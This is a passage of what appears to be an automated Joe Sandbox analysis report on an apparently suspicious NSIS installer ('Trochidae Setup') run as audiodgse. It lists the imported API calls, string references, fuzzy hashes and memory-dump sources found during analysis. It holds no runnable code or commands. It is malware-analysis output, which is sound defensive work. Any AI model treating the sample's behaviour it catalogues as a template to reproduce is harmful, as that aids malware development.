                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                  • Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
                                                  • Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                  • Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E02
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                  • MulDiv.KERNEL32 ref: 00401E24
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                  • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Calibri
                                                  • API String ID: 3808545654-1409258342
                                                  • Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                  • Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
                                                  • Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                  • Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                  • MulDiv.KERNEL32 ref: 00402D23
                                                  • wsprintfA.USER32 ref: 00402D33
                                                  • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402D2D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                  • Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
                                                  • Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                  • Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE2447
                                                    • Part of subcall function 72BE1224: lstrcpynA.KERNEL32(00000000,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE1234
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 72BE23C2
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72BE23D7
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 72BE23E8
                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 72BE23F6
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE23FD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 3730416702-0
                                                  • Opcode ID: 49282b882e2ea9f62fb21a1d645cf2fe9f82cc029c60b69ae59be2fde378b40e
                                                  • Instruction ID: d9ef99830ee571940d1e7909ff3739992b45ca8e9773557c1967f61425dc3b14
                                                  • Opcode Fuzzy Hash: 49282b882e2ea9f62fb21a1d645cf2fe9f82cc029c60b69ae59be2fde378b40e
                                                  • Instruction Fuzzy Hash: 2A4156B2D08301EFE7218F299844B2ABBF8FF44311F24896EE58796591E7309954CF62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                  • GlobalFree.KERNEL32(?), ref: 0040284C
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                  • CloseHandle.KERNEL32(?), ref: 00402877
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
                                                  • Instruction ID: ec0d33f595d451752a188c19515fdbd8f87975fde9c964b970e1a5072f162152
                                                  • Opcode Fuzzy Hash: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
                                                  • Instruction Fuzzy Hash: 7D219C72C00124BBCF213FA5CD49DAE7F79EF09364B10823AF520762E0C67959419FA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                  • wsprintfA.USER32 ref: 00404957
                                                  • SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$Trochidae Setup: Installing
                                                  • API String ID: 3540041739-3189352601
                                                  • Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                  • Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
                                                  • Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                  • Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7
                                                    • Part of subcall function 00405A0B: CharNextA.USER32(?), ref: 00405A19
                                                    • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                    • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsfF9C.tmp$T'qu
                                                  • API String ID: 3248276644-2352130648
                                                  • Opcode ID: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                                  • Instruction ID: fa13fd96d81fd76c8fc81ec80775158a1daeec84e0c55be597840f6fdc29cec0
                                                  • Opcode Fuzzy Hash: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                                  • Instruction Fuzzy Hash: D5F0C825305D6616D62233361C85EAF1649CE82364715473FF851B12D3DB3C8943DE7E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: 9002e532f9b6d0f2761b1edfbce8d719350108a17740c074ece90df8f1902a1d
                                                  • Instruction ID: 59f7c6e7a9d2975cf38b84ac6ec6e9bbda8f58e0b60774b445be24d771baef58
                                                  • Opcode Fuzzy Hash: 9002e532f9b6d0f2761b1edfbce8d719350108a17740c074ece90df8f1902a1d
                                                  • Instruction Fuzzy Hash: C951E476D20154AFDB128FACC84467DBBB9EBC4345F3430DAD527A3104E3719D428761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                  • Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
                                                  • Opcode Fuzzy Hash: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                  • Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405978
                                                  • CharPrevA.USER32(?,00000000), ref: 00405981
                                                  • lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405992
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405972
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-4017390910
                                                  • Opcode ID: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                                  • Instruction ID: 0da8bf888325795cdd0c5347214511d48edcf337a1f8d4df24ff951c9a6f7455
                                                  • Opcode Fuzzy Hash: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                                  • Instruction Fuzzy Hash: C7D0A9A2605A716AD21223199C09EDB2A0CCF02314B080063F600B22A3CA3C1D018BFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C9C
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402CBD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                                  • Instruction ID: a6da729fb9552a58d385ec1c0953cf8d4b7f97d7084d0a629d1ed2eab5a533bf
                                                  • Opcode Fuzzy Hash: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                                  • Instruction Fuzzy Hash: 8E115B32904109BBEF129F50DE09B9E7B6DEB54380F104072BE05B51E0E7B59E11AAA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 00405A0C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp
                                                  • API String ID: 3213498283-4240112750
                                                  • Opcode ID: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                                  • Instruction ID: a4ce128402f48f1feafc2c55b1118e7c053650975221e3f5fcc16cd8d0856992
                                                  • Opcode Fuzzy Hash: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                                  • Instruction Fuzzy Hash: 13F0C251B04F916BFB32A2280CD4F6B5B88CB55365F145267E280672C2C27C88408F9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DestroyWindow.USER32 ref: 00402D73
                                                  • GetTickCount.KERNEL32(00000000,00402F3E,00000001), ref: 00402D91
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                                  • Instruction ID: 88e2776c24fdb891b0502b3cf10dbd42b902845c03a9ebe61091678d0ea3e225
                                                  • Opcode Fuzzy Hash: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                                  • Instruction Fuzzy Hash: E0F05E75905221ABCA207B62BE4CACA7BA4FB42B527014976F845B31E4C3784C868BDD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004050A4
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004050F5
                                                    • Part of subcall function 004040B4: SendMessageA.USER32 ref: 004040C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                                  • Instruction ID: 69794148541a1a4d8d7be296dba567d41b1ee09d4c6a2f8e6d5670bc2f98cc64
